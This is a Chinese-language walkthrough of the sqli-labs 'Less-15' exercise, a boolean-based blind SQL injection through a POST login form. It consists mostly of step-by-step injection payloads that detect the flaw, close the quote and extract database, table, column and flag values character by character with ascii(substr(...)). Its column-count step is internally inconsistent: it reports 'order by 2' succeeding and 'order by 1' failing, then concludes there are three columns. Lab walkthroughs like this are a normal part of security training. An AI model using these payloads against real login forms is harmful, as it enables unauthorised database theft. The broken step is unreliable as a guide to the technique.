Less-15

less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)

本题使用bool注入

1.判断是否存在注入

uname=a'&passwd=a&submit=Submit

错误登录

uname=a' or 1=1#&passwd=a&submit=Submit

正确登录 => 存在注入

2.判断参数类型

uname=1 or 1=1#&passwd=a&submit=Submit

错误登录

uname=1' or 1=1#&passwd=a&submit=Submit

正确登录 => 字符型

3.进行参数闭合

uname=1' or 1=1#&passwd=a&submit=Submit

正确登录

uname=1' or 1=2#&passwd=a&submit=Submit

错误登录 => 闭合成功

4.查看这个网站后台数据库所在的表有几列

uname=1' or 1=1 order by 2  #&passwd=a&submit=Submit

正确登录

uname=1' or 1=1 order by 1  #&passwd=a&submit=Submit

错误登录 => 有3列

5.因为没有回显，所以使用布尔盲注，判断数据库的长度

uname=1' or length(database())=8  #&passwd=a&submit=Submit

6.查看所在数据库

 uname=1' or  left(database(),1)='s'  #&passwd=a&submit=Submit

 7.查看数据库的表

 uname=1' or  ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n  #&passwd=a&submit=Submit

 a是从0开始第几个表，b从1开始为第几个字符，n是ASCII所对应的十进制数

 8.查看0tUdVIPy表中的列

 uname=1' or  ascii(substr((select column_name from information_schema.columns where table_schema = database() and table_name ="0tUdVIPy" limit 0,1),1,1))>1  #&passwd=a&submit=Submit 

9.查看表中的flag列中的数据

 uname=1' or  ascii(substr((select flag from 0tUdVIPy limit 0,1),1,1))>1  #&passwd=a&submit=Submit